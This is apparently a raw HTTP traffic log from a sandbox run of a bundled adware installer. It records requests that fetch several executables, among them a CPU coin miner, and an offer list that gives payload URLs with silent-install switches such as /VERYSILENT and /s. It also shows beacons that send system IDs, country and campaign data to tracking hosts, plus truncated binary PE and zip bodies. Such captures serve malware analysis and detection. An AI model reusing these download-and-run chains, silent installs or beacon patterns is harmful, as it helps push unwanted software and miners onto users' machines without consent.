Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: E0nJoZPzH6UQYOUrE1T7xC 85vHAIA2MC4HqsApLsOf7TfxMc6bkxLS46 kWLGDb Au1UA iIA0=..x-amz-request-id: 6CFBDB0B49423DAB..Date: Wed, 02 Sep 2015 06:39:38 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..
GET hXXp://installer.afsbdfgds.net/installer.php?id=800&env=2&setup_version=42.4&srcid=&dbb=ZHNwdHRjc3B4dGY=&pub_id=362&os=5.1&dotnet=4 HTTP/1.1
Accept-Language: en
Host: installer.afsbdfgds.net
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Sep 2015 06:41:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
1ffa2..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en"> .<head>..<meta charset="UTF-8">..<link rel="stylesheet" type="text/css" href="css/global.css">..<link href="css/jquery-ui.css" rel="stylesheet" type="text/css"/>..<script type="text/javascript" language="javascript">./*! jQuery v1.10.2 | (c) 2005, 2013 jQuery Foundation, Inc. | jquery.org/license.//@ sourceMappingURL=jquery.min.map.*/.(function(e,t){var n,r,i=typeof t,o=e.location,a=e.document,s=a.documentElement,l=e.jQuery,u=e.$,c={},p=[],f="1.10.2",d=p.concat,h=p.push,g=p.slice,m=p.indexOf,y=c.toString,v=c.hasOwnProperty,b=f.trim,x=function(e,t){return new x.fn.init(e,t,r)},w=/[ -]?(?:\d*\.|)\d (?:[eE][ -]?\d |)/.source,T=/\S /g,C=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,N=/^(?:\s*(<[\w\W] >)[^>]*|#([\w-]*))$/,k=/^<(\w )\s*\/?>(?:<\/\1>|)$/,E=/^[\],:{}\s]*$/,S=/(?:^|:|,)(?:\s*\[) /g,A=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,j=/"[^"\\\r\n]*"|true|false|null|-?(?:\d \.|)\d (?:[eE][ -]?\d |)/g,D=/^-ms-/,L=/-([\da-z])/gi,H=function(e,t){return t.toUpperCase()},q=function(e){(a.addEventListener||"load"===e.type||"complete"===a.readyState)&&(_(),x.ready())},_=function(){a.addEventListener?(a.removeEventListener("DOMContentLoaded",q,!1),e.removeEventListener("load",q,!1)):(a.detachEvent("onreadystatechange",q),e.detachEvent("onload",q))};x.fn=x.prototype={jquery:f,constructor:x
<<< skipped >>>
GET hXXp://bi.afsbdfgds.net/?pageNumber=0&event=document_ready&description=window_of_setup_loaded&pub_id=362&setup_id=800 HTTP/1.1
Host: bi.afsbdfgds.net
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Sep 2015 06:41:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0......
GET hXXp://bi.afsbdfgds.net/?pageNumber=1&event=window_close&description=user_clicked_close_button&pub_id=362&setup_id=800 HTTP/1.1
Host: bi.afsbdfgds.net
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Sep 2015 06:41:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
0......
GET /df4a6a3ed77e60d6758afca091ca0c1f.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: d16hr9n7t75k58.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/x-msdownload
Content-Length: 83341
Connection: keep-alive
Date: Mon, 31 Aug 2015 11:33:25 GMT
Last-Modified: Mon, 31 Aug 2015 09:09:52 GMT
ETag: "e822fe92076c33fa1784749fa9328584"
Accept-Ranges: bytes
Server: AmazonS3
Age: 68695
X-Cache: Hit from cloudfront
Via: 1.1 7f0216233154388a0ffe191ece5a7b12.cloudfront.net (CloudFront)
X-Amz-Cf-Id: C8lxDprMxxIYnxRFafCnglCWjaDXDmHcxIZu_HsYWJarzg5I0yAoLw==
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P&..............................................t.......@&..............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P#..............................rsrc........@&......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /CPUminer/Bundle_CPUminer.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.software-forus.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:28 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439472602"
Last-Modified: Thu, 13 Aug 2015 13:30:02 GMT
Cache-Control: max-age=54530
Content-Length: 100529
Content-Type: application/octet-stream
X-HW: 1441175969.dop008.am4.t,1441175968.cds046.am4.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................p...............................................s.......`..8............................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata... ...@...........................rsrc...8....`.......v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /os/rm/OfferScreen_460_v2.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:40:03 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1437733599"
Last-Modified: Fri, 24 Jul 2015 10:26:39 GMT
Cache-Control: max-age=25556
Content-Length: 7704
Content-Type: application/zip
X-HW: 1441176003.dop002.am4.t,1441176003.cds039.am4.c
PK........Q~.B...._...........inner.png.V.P.i..da.QP...h.......$.!$ G.`........4$...UP.Ee8,..%.(.............u5..."r8r8......).j_U.....wW.......V. ...~.4.f5.<yz..w...].b..f.X.@&.H ...s!.O...........#.H.0.-c3.$.,Bs.u..Q<b^.=...^,$..P.PLF.k....|2*...2..P..7E..R..y).<"....pW.4."H....8... .>..4..k....".%.~s.........h.#.K...3.t........b1 ..uq..$....._...&..HL...[....#...0..\..;.aI4.$...,...9j4...b.G.(.Z/0. )O"...a10..p.D...Z.A..`.N,.~I.&e..'.........-.1!..........I.D.OS......:..|....D.).'....E.X.G#.4_.|!.D.P..>T.......5..\])x...........aAgW"..s.r%.@..G.i>T".......A....X*..y..V....U,.*.82X...q......`i...PYx4....|X../..O!.0...H`..9.$.....q....?9.h...W.,\i:p~.{.o....H....f4>}...@.t..(...oB.......h3A.g.....o..i)L...1:m..s.I..e.['/.p..U~..n..X..qzYd{./...Z...^..>..\..>w....!.PY44...a?.;%x....%..........kU....y.B_a.( ....,T#*.M..2iLI..C.. .FX....c.%:.s....F.@..wN}.i.....lb..&.........uV_.m.J....S3U.N. ..Y>f6f.t.....F...d....tBf..z....t..E.......u....m_u...77.vI.jVEn.00.....Z<[2....OZj].....n.0.Q. ....H..8.L62.zJ.'...X..d.......>...T......(.X....i.|...>L*ub......l.o..qe.>f6........{'e....z..p.wM...'....d!.-J.fn.K8".WD...... .ld>Rrb..........K...gz.....5l......4}...e2Q~9,..!...2..K....}.W.._....eM...Et\...|S. .1#/..82rkH....n..O.\m.b.........g.t~E....gN...q.%...;'"..^4m.............w.e......38..V.L......^.u..j.e.......Cvi.......vq$k'.....S.N..op.9.WV<g.. wmS............b.z$.9.>.7.T.....u.>.....-.<ps......K.v. .<.H...F.F....w.9................G.%..u......w.{....LB..
<<< skipped >>>
GET /69/all/cp/row/setup.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: dl.staticclientstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:12 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1440321301"
Last-Modified: Sun, 23 Aug 2015 09:15:01 GMT
Cache-Control: max-age=1644
Content-Length: 1965128
Content-Type: application/x-msdownload
X-HW: 1441175953.dop001.am4.t,1441175952.cds064.am4.c
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........S..............>.........q.............e...............b.......K.......r.........X.............:.......v.......?.....Rich....................PE..L......U.....................~....................@..........................p......q_....@.......................................... ...A..............H....p..........8...........................h...@............................................text...T........................... ..`.rdata..z...........................@..@.data....0..........................@....rsrc....A... ...B..................@..@.reloc.......p......................@..B................................................................................................................................................................................................................................................................................................................U...M.V3.;.tb.A.;.t[.p..q..q..q..P.;.t.....Q0..0....0.p..p..p .p8.p<.@......Hl.HP.HL....................3.^]........^]..........U...M.3.;.t..A.;.t.Q.P(.P,.P0.^...]........]....U...M.W..tt.y...tmSV.u...y.3..........C..0}......t....|....~.^[....._]....G4..t.9w$t.P.A(.I$P...M.....G4....Q._..w$.X...^[_]........_]..........U...E.S3.;........81.......}.8......V.u.;.u.^.C.[]....^.9^ u..F ` @..^(9^$u..F$. @..F(.N Wh....j.P.......;.u._^.....[]....U.R.~.V._4.........t..F(.N$WP......F....._^..[]........[].......
<<< skipped >>>
GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Wed, 02 Sep 2015 06:39:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.23
355..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://special-bundles.s3-website-us-east-1.amazonaws.com/setup_362.exe..hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=iml..hXXp://VVV.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Wed, 02 Sep 2015 06:39:10 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..355..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=imi-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..http://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..hXXp://d16hr9n7t75k58.cloudfront.net/df4a6a3ed77e60d6758afca091ca0c1f.exe.. /ci 12216
<<< skipped >>>
GET /SysInfo/validator/timer.php HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.3
Date: Wed, 02 Sep 2015 06:39:11 GMT
Content-Type: application/octet-stream
Content-Length: 165898
Connection: keep-alive
X-Powered-By: PHP/5.5.23
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=lHFcE.exe
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
GET /os/rm/OfferScreen_12_HD_v2.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:40:02 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1432644107"
Last-Modified: Tue, 26 May 2015 12:41:47 GMT
Cache-Control: max-age=25557
Content-Length: 10033
Content-Type: application/zip
X-HW: 1441176003.dop002.am4.t,1441176002.cds040.am4.c
PK........K..B................img12_1.jpg.T.T.i....%qI.E..p.YTH.M..GLQ3...R4..G..;....V.Y....Le.RZ...GN*5ifei.{e.._3s...........{...{.{..G....u........M./.......G.. @]..QA.`.H.X@.by".P.?.m...b%..,......H....l12....QPo..QH....t`...7v$.. d.%x..'D.;.P...5... ....H.w'OD.PP_..U./0...J.GSP._^ 71|.n|!..`.....x$...o.s.w\.$..8,....0x...D.......M..Af...v.........g.gg..F`....X..K `T..(.'..`x"......p!G ..y./~h.?VLA.....PP.........r...Eb&{...E...6....c..l....X@v..C.|.?...{.}".b.(./@..9 .9<.?N...`..<.8.....SP*...a....$".H..v$....TG....u.....=.........e.......n?.~.....B..l.z!...Z0...\........\\........3..T......:#..{6O5.B.P...:_.......4....h...C.5 ..-...@SCCs.6........jz.:.z.:.......&...&.?...B...%zzK.-._.......@_....`.>.......[.T.PS..@....T...5Aj..._.....`5...(...Q....... .PW.P.A..P...l.....T.0...=7?.......h.....{.m0H..X.p.Bb.%....:.u........EL..#..k.R......5..... S.9........?}&..:.ix.>;d.....$L..../..@...*&....>v......&C.=..^I....<dFZ.....dee{(..&..g(6...<Q.g:.. Z.4...:S.&..-.. 3_....m7H.....k.c.[...Q.E.y..w.V..V'..F0.%. .Y..(.7.N.hiW,....{Z~..S7....4.R6...8.A......b..s..i.d...-y...:O[0..#3U...^... 7M.9......|.}`..~.V4q:.t..ENH[:.z.^.W.4......QF..>A .S.......1}.......@.5..=....d.oh.}.`.....9..%..G.....v.........j.pw.....r.?....@&....y..}f..#..........v.O...u....'f.$..d..Z.>f....t..sA..O._.$[<w..v...N.8.$....a<.S...[{HWF085.L.."^.;NQMv.J.^...7...H.....WG>...6.........W7..I......4eiZ.L..e=.|....v..r(L......m.m..v.LY....T.7... .}q\......g%..M...$-.....C;S>n.....t;.e.b..|.7&.0.=.r..}fep...
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.004 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:17 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=6310
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1441175957.dop018.am4.t,1441175957.cds037.am4.c
./..:S.p}...E.%C...Z#.e(..4z..i8..7..=.U."G.}.(Z.q.kR...%..M....d.&.F..).'|mZ"K...@....&.._.[...jK..I8..g.-.V.U....#...K.M@..z).b.W,O.jUny\.ty...uU6......a%....O..~......W.)U.dG>TU.vw^..*..?..A.Zz.....C.....@...-...3.:)XqWM.3\..7.....H.*...Ja.F.....A....m..'......N...K._.b... .'M.fD..y....Z..}'!SS.l..r.l.&rf...$/....`X....<0.^.J..N .tJ)<^...]...|Zd`2=.$t.d...Tm..wI.W.U....:.va...Mz0/.:.....%M.....'O._...6....._....dW..b/....v....T'..}...b.aJ...P.N...j.{.."H.....D4.....-7...E.....[..R{bz..L*.m2]...J.."1. DT....._.t.A.4......Z....?..I.I........Q...."....m,eNO...h..8s..i,..8n....t/<.......j9.rK....>.px.........^".j^.c......<.*X7..b..g..."..Na..:3..sj.j.Pk....;\...e.......f......."...#...*|%zB.O...&.....5n7..6..v..2.k<N*>N...9..L..F........T ....\..jS...%R..m:Fke.d.....d.......g.s...H......t....O3....u]..Q!.r....D.*@......$*.5\7.4i|...1.....s....k.a.Y..@.....U..........(...6...7{.i.|[.Do!..)..?...W\.m...*.~....r.... E3<..%0)Au...f..T.*.<n....bK tf.'P............e......d... .V...}.a.QE.pn-x.B......R....h.Q.W,.$......H,...*...XP..D...:\.ngJ..0~3.. j.....,.m.....H........b{..G.m......>.:.....?.....y......]......8h.N.....@.>..M^.p..c6.&.?x.T.oI.=......{ua..)....9V...2.2..<P.t<.I....'~..3.n]......u....tn...q....h. ...Kg.._...#...:.....-=...m.7..T...v........Kh.ti.n.oc.xP..1=(........47...............X.Vo:.K....?.V....z ...0Z.e].6F...Q.#.7r7....j....Tb..o..k8t.Z#....GXiZ.._...(.....-.(..Y.ew..[4... ... ..d..l..).m.FQ.MU..=.@....*.........P.'...(C......{.....u.W..$..3A..... ...<
<<< skipped >>>
GET /crossbrowse/ie/106/ie.zip.005 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: zip.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:16 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1431408217"
Last-Modified: Tue, 12 May 2015 05:23:37 GMT
Cache-Control: max-age=6311
Content-Length: 8076624
Content-Type: text/plain; charset=UTF-8
X-HW: 1441175957.dop018.am4.t,1441175956.cds060.am4.c
.p.w..n..{j..Z.\r/%..#k(. .~.N*.....uo...,.....].ys.....=.VS..u..'..a...>...0>.`X.E ..Lm.#SY....t.AZ..S&..L..?...4..k.scM}.|j.f.V.%Tw...........S...m%......(.^l@..n)....1....g.!.|......2V]N.. .Yj..k~:.mAb..5u.E......p..._.K ..h...9..pil......7f%.......T...../.....yh....R..xi..".T....YyQ^V..T..l.?.S]....R.....j.!....H.q.V.j..X....K..l7..s.SV.,.D........:.......-...`\O.......E_..j.&......6.o....)M...6......i,7......a.).F...k9....J !.....K.q6.O.6.#}c..-.zo6..".....TtoK...e.w..7$[&).cJ/......h..'2:....,...>....5.....l...~.........Pjd..OJ[....$i}.bw..*[~.`...".P......`...Uv/v...E..'.0=&.#.5H*y.V>..>....m.#...P..P:.$.OO.....l"..V...lLX.R>y.*..f..'.5......F>a.h..W)...B.l...s..J........n.}.....o.1.M...V..Y.:.@.Z.^"...*$..^.[.m..?...). .H=$...ne...wQ.p.........ZKX.[.[ek.....I~.E..-.......Z.V.]3.........J..H...p..:..X];.a......~.d.....,......K...p..t...o....i..H0.9..u#...c....T7V.S...*..-.IZ......i\...!..2~rU..e.JP..._.nQ...v~....o....U........f$.-.kJ....$'....U:..g.....l#...i......{r.....[..oe7`..l....1n.R.....e.B}][w.HR2.3v.O.cw...N...............k..=..LN=H2...Fjs...LdG....T:.2"..c.e..U..r].>#..g%...f.gg.....A0.,.........KC..?^.|.h..i.f.1.......E.5 .G....f.*...OZ.`.~Z.f......&u...w.6o.e ..*xQ.I......2Ui..P7...'..C....0..vV.V3.;.gw...e[....#..1C.u......'...%...\.....|.c.VD..7..3 6u%sJ.....e....9.@r..x}.. EP.i.by.mF.;......GP..ia....;6.....CJdu...[V|Ll..8....x.h/.F}%0.....'.P....]..gg.....6....U....?....R'/.fv.hF........tk....y D.cD....%. .P^...Px._..,..w.-DL!05.}/h.6zk.l....r..y......;Y...D.o.R..
<<< skipped >>>
GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ads.regiedepub.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:35 GMT
Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1
Content-Location: settags.cgi
Vary: negotiate
TCN: choice
Cache-Control: no-store, no-cache, must-revalidate
X-C4PC-ServerName: ads.regiedepub.com
P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Expires: Wed, 02 Sep 15 06:39:00 GMT
Set-Cookie: _c4aid=34887D5223304C22AF037B2539E4DD35; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Set-Cookie: _c4aid2=34887D5223304C22AF037B2539E4DD35,1441175975.68785; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;
Connection: close
Transfer-Encoding: chunked
Content-Type: text/javascript
41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..
GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 02 Sep 2015 06:39:09 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 May 2015 18:22:11 GMT
Connection: keep-alive
ETag: "55563953-f21d"
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@.......................... ...............................................t...........C...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc....C.......D...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>
POST /thankyou.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.downloadsoup.com
Content-Length: 459
Connection: Keep-Alive
Cache-Control: no-cache
cnt=d8ed7e7dc6a19345be5b5f7a131ee532&_srvlog=NSI &browser=ie&capp=nsdummy&cid=12216¤t_screen=Finish_Last_Screen&is=0&netfs=0&os=&sysid=6FE5DDD064E91F40D31A83BB9FE8886E&sysid1=6FE5DDD064E91F40D31A83BB9FE8886E&te=1441175975&ts=1441175974&ver=1.1.2.41&c[CPUminer][s]=-2&c[Updater][s]=8&c[Updater][pi]=1&c[CPUminer][pi]=0&c[CPUminer][e]=0&c[CPUminer][ts]=0&c[CPUminer][te]=0&cmdl=C:DOCUME~1admLOCALS~1Tempsm25.tmp /ci 12216&bti1=
HTTP/1.1 200 OK
Content-Type: text/plain; charset=UTF-8
Date: Wed, 02 Sep 2015 06:39:31 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 14
Connection: keep-alive
.... ..HTTP/1.1 200 OK..Content-Type: text/plain; charset=UTF-8..Date: Wed, 02 Sep 2015 06:39:31 GMT..Server: Apache/2.2.15 (Red Hat)..X-Powered-By: PHP/5.3.3..Content-Length: 14..Connection: keep-alive...... ....
GET /data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=4&rnd=6761 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:37 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1441175978.dop005.am4.t,1441175977.cds063.am4.c
GIF89a.............,...........D..;..
GET /data.gif?app=12345&ibic=0beb334165382025853a9a860db0b131&verifier=c44c7974c60e7df1a3884ce64812983e&ver=106&os=XP32&browser=ci&campaign=003266&browserver=106&country=UA&event=3&rnd=3075 HTTP/1.1
Accept: */*
Host: logs.rgbdomsrv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:15 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1441175955.dop005.am4.t,1441175955.cds063.am4.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Wed, 02 Sep 2015 06:39:15 GMT..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 35..Content-Type: image/gif..X-HW: 1441175955.dop005.am4.t,1441175955.cds063.am4.c..GIF89a.............,...........D..;..
GET / HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Wed, 02 Sep 2015 06:39:14 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Wed, 02 Sep 2015 06:39:14 GMT..Connection: keep-alive..Content-Type: application/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codename Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..
GET /crossbrowse/ie/106/ie.zip.001 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
